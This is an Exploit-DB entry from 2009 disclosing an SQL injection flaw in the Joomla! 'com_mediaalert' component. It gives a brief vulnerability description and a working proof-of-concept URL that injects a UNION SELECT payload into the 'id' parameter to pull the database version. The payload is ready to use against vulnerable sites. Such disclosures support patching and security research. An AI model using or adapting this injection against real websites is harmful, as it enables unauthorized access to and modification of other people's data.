Joomla! 'com_mediaalert' Component - 'id' Parameter SQL Injection Vulnerability

2009-09-11T00:00:00
ID EDB-ID:33218
Type exploitdb
Reporter Moudi
Modified 2009-09-11T00:00:00

Description

Joomla! 'com_mediaalert' Component 'id' Parameter SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/36356/info

The 'com_mediaalert' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 


http://www.example.com/index.php?option=com_mediaalert&id=null+union+select+1,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--